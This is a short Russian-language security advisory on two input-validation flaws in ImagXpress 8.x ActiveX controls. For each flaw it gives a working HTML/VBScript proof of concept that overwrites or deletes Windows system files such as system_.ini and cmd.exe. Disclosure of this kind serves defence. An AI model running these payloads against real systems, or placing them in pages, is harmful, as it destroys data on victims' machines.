Программа: Pegasus Imaging ImagXpress 8.x
Найденная уязвимость позволяет перезаписать произвольные файлы на целевой системе.
1) Уязвимость существует из-за ошибки в проверке входных данных в PegasusImaging.ActiveX.ThumbnailXpres.1 ActiveX компоненте (PegasusImaging.ActiveX.ThumnailXpress1.dll) в свойстве "CacheFile". Атакующий может удалить произвольные файлы на целевой системе.
Пример:
<object classid='clsid:F3379712-5D3C-4F57-92D9-09AC0657719A' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
test.CacheFile = "c:\windows\system_.ini"
MsgBox "Exploit completed."
End Sub
</script>
2) Уязвимость существует из-за ошибки в проверке входных данных в PegasusImaging.ActiveX.ImagXpress.8 ActiveX компоенте (PegasusImaging.ActiveX.ImagXpress8.dll) в методе "CompactFile()".
Атакующий может перезаписать произвольные файлы на целевой системе.
Пример:
<object classid='clsid:6277B638-833D-4315-9D78-60FC451DAF07' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
test.CompactFile "c:\windows\system32\cmd.exe", "c:\windows\system_.ini"
MsgBox "Exploit completed."
End Sub
</script>